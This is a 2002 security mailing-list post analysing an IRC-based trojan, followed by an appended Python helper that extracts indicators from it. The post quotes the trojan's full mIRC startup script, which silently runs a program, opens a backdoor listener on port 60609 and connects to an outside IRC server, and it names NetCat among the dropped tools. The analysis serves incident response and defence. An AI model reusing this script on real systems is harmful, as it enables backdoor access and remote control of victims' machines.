From: Kyle Lai (aladin168_at_hotmail.com)
Date: Wed Sep 11 2002 - 03:48:02 CDT


    In-Reply-To: <F1E50062AEB5D411971E002035710A7304C3F950MSXDENUSR01>

    One of the Microsoft PSS Security Specialists contacted me after reading my
    analysis. I gave them a copy of the virus/trojan/malware I analyzed, and
    I also expressed my concern about their analysis. I did not hear back
    from them yesterday, but maybe we should give them a couple of days. However,
    I still want to make sure everyone that was infected runs Anti-Trojan
    software to remove any trojan and hacker tools. It's detailed in my
    analysis.

    http://groups.google.com/groups?dq=&start=25&hl=zh-TW&lr=&ie=UTF-8&oe=UTF-8&group=microsoft.public.scripting.virus.discussion&selm=bf0f8e77.0209080706.7f395b0c%40posting.google.com

    I did point out that there was a file called "ncp.exe", which in fact was
    NetCat, one of hackers' favorite tools that could possibly allow a hacker
    to remote control the victims' systems... The other one is mt.exe, which could
    be a dDoS agent (not confirmed). MS is aware of these situations. Let's
    make sure all the victims out there are at least recovering their systems
    properly!

    Also, secedit.bat did NOT change the security policies. "DLL32NT.HLP" was
    the actual text (mirc script) file that caused the problems...

    Here is the actual script that got run:
    +++++++++++++
    on *:start:{ if ($exists(mdm.exe) == $false) { exit } | //run
    mdm.exe /n /fh | //set %server DEM0N.daemon.sh | //set %timeout 10
    | if ($portfree(60609) == $false) { exit } | if ($portfree(60609) ==
    $true) { /socklisten blah 60609 } | //nick $read mdm.scr $+ $r(1,9)
    | //timerc 1 4 //server %server $+ : $+ 6667 | //run mdm.exe /n /fh
    | //remini NT32.ini ident userid | //remini NT32.ini mirc user | //remini
    NT32.ini mirc email | //writeini NT32.ini ident userid $read mdm.scr
    | //writeini NT32.ini mirc user $randomgen($r(0,9)) | //writeini NT32.ini
    mirc email $randomgen($r(0,9)) | //identd on $r(a,z) $+ $read mdm.scr $+ $r
    (a,z) | //timercoolconnect -o 0 100 //server %server 6667 | //timer 1
    1 //run -n secedit /configure /DB secedit.sdb /cfg $mircdir $+
    tftp8675 /quiet | fos }
    +++++++++++++

    As I looked in further, the "designer" of this trojan/malware used "UPX
    Executable Packer" from http://upx.sourceforge.net to compact the
    taskmngr.exe (really a mirc 5.70 client), so it reduced the filesize from
    (1.3M) to 442K. It also compacted so well that there are very few ASCII
    characters to read from a hex editor. Once you use UPX to decompress it,
    you can read a lot more. I am still trying to see if anything was
    modified. Please let me know if anyone finds anything out there. I am not
    sure if the mirc client has been modified...

    The above script also opened a backdoor on port 60609...

    If you have more info, please pass along.

    Regards,

    Kyle Lai, CISSP, CISA
    Kyle Lai Consulting
    aladin168hotmail.com
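
Added example (not part of the post above, and not Microsoft's or Kyle's tooling): a small Python triage helper that pulls the responder-relevant indicators out of a mIRC script such as the one quoted in the post. The script text embedded below is the quoted script joined back onto one line; the splitting on "|" relies on mIRC's command-separator convention and the regexes are assumptions about the command forms seen in this sample.

```python
import re

# Constructed sample: the mIRC startup script quoted in the post above,
# with the mail-client line wrapping undone.
SAMPLE_SCRIPT = (
    "on *:start:{ if ($exists(mdm.exe) == $false) { exit } | //run "
    "mdm.exe /n /fh | //set %server DEM0N.daemon.sh | //set %timeout 10 "
    "| if ($portfree(60609) == $false) { exit } | if ($portfree(60609) == "
    "$true) { /socklisten blah 60609 } | //nick $read mdm.scr $+ $r(1,9) "
    "| //timerc 1 4 //server %server $+ : $+ 6667 | //run mdm.exe /n /fh "
    "| //remini NT32.ini ident userid | //remini NT32.ini mirc user | //remini "
    "NT32.ini mirc email | //writeini NT32.ini ident userid $read mdm.scr "
    "| //writeini NT32.ini mirc user $randomgen($r(0,9)) | //writeini NT32.ini "
    "mirc email $randomgen($r(0,9)) | //identd on $r(a,z) $+ $read mdm.scr $+ $r "
    "(a,z) | //timercoolconnect -o 0 100 //server %server 6667 | //timer 1 "
    "1 //run -n secedit /configure /DB secedit.sdb /cfg $mircdir $+ "
    "tftp8675 /quiet | fos }"
)


def extract_indicators(script: str) -> dict:
    """Return listening ports, IRC servers/ports, launched programs and
    INI files written by a mIRC script. mIRC separates commands with '|',
    so each segment is classified on its own (assumed command forms)."""
    flat = " ".join(script.split())  # collapse wrapped lines / whitespace
    ind = {"listen_ports": set(), "servers": set(), "irc_ports": set(),
           "run_programs": [], "ini_writes": []}
    for cmd in (c.strip() for c in flat.split("|")):
        if m := re.search(r"/socklisten\s+\S+\s+(\d+)", cmd):   # backdoor listener
            ind["listen_ports"].add(int(m.group(1)))
        if m := re.search(r"//set\s+%server\s+(\S+)", cmd):     # C2 host variable
            ind["servers"].add(m.group(1))
        if "//server" in cmd and (m := re.search(r"(\d+)\s*$", cmd)):
            ind["irc_ports"].add(int(m.group(1)))                # port of /server
        if m := re.search(r"//run\s+(?:-\w+\s+)?(\S+)", cmd):   # external program
            ind["run_programs"].append(m.group(1))
        if m := re.search(r"//writeini\s+(\S+)", cmd):          # persisted config
            ind["ini_writes"].append(m.group(1))
    for key in ("listen_ports", "servers", "irc_ports"):
        ind[key] = sorted(ind[key])
    return ind


if __name__ == "__main__":
    for key, value in extract_indicators(SAMPLE_SCRIPT).items():
        print(f"{key}: {value}")
```

Any listen_ports entry is the thing to check first on a suspected host (netstat for that port), and run_programs tells you which binaries to collect for analysis.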

    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see: http://aris.securityfocus.com